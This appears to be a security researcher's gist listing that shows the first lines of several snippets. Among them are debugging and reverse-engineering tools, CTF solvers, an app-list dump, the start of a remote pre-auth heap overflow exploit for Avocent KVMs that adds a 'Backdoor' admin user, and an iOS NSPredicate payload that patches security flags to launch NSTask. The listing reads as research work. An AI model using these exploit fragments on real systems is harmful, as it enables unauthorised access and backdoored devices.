

aemmitt-ns / svc_hook.js
Last active June 13, 2024 21:49
frida script to hook arm64 syscalls
// Frida: the module whose syscalls get hooked. "app_name" is a stand-in
// left by the author; replace it with the target module's real name.
const module = Process.getModuleByName('app_name');
// Hex string of the two arm64 instructions `svc 0x80; ret` (little-endian bytes).
const syscallbytes = '011000d4c0035fd6';
Process.setExceptionHandler((e) => {
if (e.type == "breakpoint") {
// do stuff here
e.context.pc = e.context.pc.add(4); // advance to after bp
return true;
} else {
return false;
aemmitt-ns / asmpwn.py
Last active December 30, 2023 15:08
Remote pre-auth heap buffer overflow exploit for Avocent KVMs
import socket, struct, sys
def p32(x):
    """Pack x as a big-endian unsigned 32-bit integer (struct format ">I")."""
    return struct.pack(">I", x)


def p16(x):
    """Pack x as a big-endian *signed* 16-bit integer (struct format ">h").

    Values outside -32768..32767 raise struct.error.
    """
    return struct.pack(">h", x)


def p8(x):
    """Pack x as a *signed* 8-bit integer (struct format ">b").

    Values outside -128..127 raise struct.error.
    """
    return struct.pack(">b", x)
# ASMP heap overflow exploit creates new applianceAdmin user
def exploit(hostname, username="Backdoor", password="Backdoor"):
global socks # python closes out of scope sockets
port = 3211 # port is hardcoded in the binary
usernm = username.encode()
aemmitt-ns / ida.rs
Last active June 5, 2023 16:39
use radius2 api to solve IDA ctf challenge
use radius2::{Radius, RadiusOption, State, vc};
fn main() {
let options = [RadiusOption::SimAll(true)];
let mut radius = Radius::new_with_options(Some("challenge"), &options);
let mut state = radius.callsym_state("main");
let flag = state.symbolic_value("flag", 8*0x18);
state.constrain_bytes(&flag, "[ -~]");
radius.set_argv_env(&mut state, &[vc(0), flag.clone()], &[]);
aemmitt-ns / restricted.m
Created May 19, 2023 14:06
program to dump out forbidden classes and selectors in NSPredicates
// dump classes and selectors forbidden in NSPredicates
// `cc -framework Foundation -o restricted restricted.m`
#import <Foundation/Foundation.h>
#import <dlfcn.h>
int main() {
void *cf = dlopen("/System/Library/Frameworks/CoreFoundation.framework/CoreFoundation", 0);
NSDictionary* (*RestrictedClasses)() = dlsym(cf, "_CFPredicatePolicyRestrictedClasses");
NSDictionary* (*RestrictedSelectors)() = dlsym(cf, "_CFPredicatePolicyRestrictedSelectors");
NSLog(@"Restricted Selectors: %@", RestrictedSelectors());
aemmitt-ns / funtime.js
Last active December 30, 2023 06:26
funtime: detailed objective-c runtime tracing. ex `python funtime.py -n Messages '-[NSRegularExpression *]'`
const typeMap = {
"c": "char",
"i": "int",
"s": "short",
"l": "long",
"q": "long long",
"C": "unsigned char",
"I": "unsigned int",
"S": "unsigned short",
aemmitt-ns / .radare2rc
Created November 22, 2022 20:43
r2 GEF style context
"$c=?e ------------------------------------ registers -----------------------------------;?e;dr=;?e;?e ------------------------------------ disassem ------------------------------------;?e;pdi 8;?e;?e ------------------------------------ stack ---------------------------------------;?e;pxr 128@SP;?e;?e ----------------------------------------------------------------------------------;"
"$ds=ds;$c"
"$dc=dc;$c"
aemmitt-ns / quinefuck.m
Last active October 14, 2023 19:36
a brainfuck interpreter made with an NSExpression that evaluates on itself. idk.
// yields brainfuck when quined
// Default brainfuck program, used by main() when no program is passed as argv[1].
// The two adjacent string literals are concatenated by the compiler into one string.
char *h = "++++++++[>++++[>++>+++>+++>+<<<<-]>+>+>->>+[<]<-]"
">>.>---.+++++++..+++.>>.<-.<.+++.------.--------.>>+.>++."; // -> Hello World!
#import <Foundation/Foundation.h>
int main(int argc, char *argv[]) {
NSString *program = [NSString stringWithUTF8String: argc > 1 ? argv[1] : h];
NSMutableArray *prog = [NSMutableArray array]; // make the program into an array cuz its easier
for (int i = 0; i < program.length; i++) {
NSString *c = [program substringWithRange: NSMakeRange(i, 1)];
if ([@".,<>-+[]" rangeOfString: c].location != NSNotFound) [prog addObject: c];
aemmitt-ns / unplugged_apps.json
Created July 28, 2022 22:36
list of apps on the unplugged "app store" returned from /api/store/app?size=10000
[
{
"applicationId": "com.unplugged.antivirus",
"applicationName": "UP Antivirus",
"applicationType": "TOOLS",
"description": "Keep your device clean from malware and viruses in realtime",
"versionName": "2.22.9",
"versionCode": 84,
"privacyRating": 5,
"iconUrl": "https://up-apps-demo.s3.eu-west-1.amazonaws.com/antivirus/icon/logo.png",
aemmitt-ns / nspredpayload.m
Last active December 30, 2023 06:26
NSPredicate payload for iOS that disables security checks and launches an NSTask
NSPredicate *pred = [NSPredicate predicateWithFormat:@"1=cast({" // cast to get nice error in syslog for debugging
// use format string to read the address of _NSPredicateUtilities ( #self() ), theres prolly a better way
"$_NSPredicateUtilities := function('','stringByAppendingFormat:', '%p/%lld', #self()).lastPathComponent.longLongValue,"
"$_predicateSecurityFlags := $_NSPredicateUtilities + 0x188c," // address of _predicateSecurityFlags
"$_predicateSecurityOnce := $_predicateSecurityFlags - 0x276daec," // address of _predicateSecurityOnce
"$forbiddenClassesLength := $_predicateSecurityFlags + 0x63a334," // address of length field for array of forbidden classes
"$forbiddenSelectorsLength := $_predicateSecurityFlags + 0x63a3d4," // address of length field for array of forbidden selectors
"$NSTask := $_NSPredicateUtilities + 0x637860," // address of NSTask class
"$NSPipe := $NSTask - 0x41a0," // address of NSPipe class
aemmitt-ns / main.rs
Last active June 10, 2022 02:57
ollvm challenge solution
use radius2::{Radius, State, Value, vc};
// output:
// FLAG: mirror_mirror_on_the_wall_whos_the_ugliest_handler_of_them_all?!
// target/release/ollvm 0.92s user 0.04s system 99% cpu 0.964 total
/// Eight 64-bit constants used by the solver in this file.
/// Order is significant and is kept exactly as in the original listing;
/// how they are matched is decided by the (not shown) solver code — confirm there.
const HASHES: [u64; 8] = [
    0x875cd4f2e18f8fc4,
    0xbb093e17e5d3fa42,
    0xada5dd034aae16b4,
    0x97322728fea51225,
    0x4124799d72188d0d,
    0x2b3e3fbbb4d44981,
    0xdfcac668321e4daa,
    0xeac2137a35c8923a,
];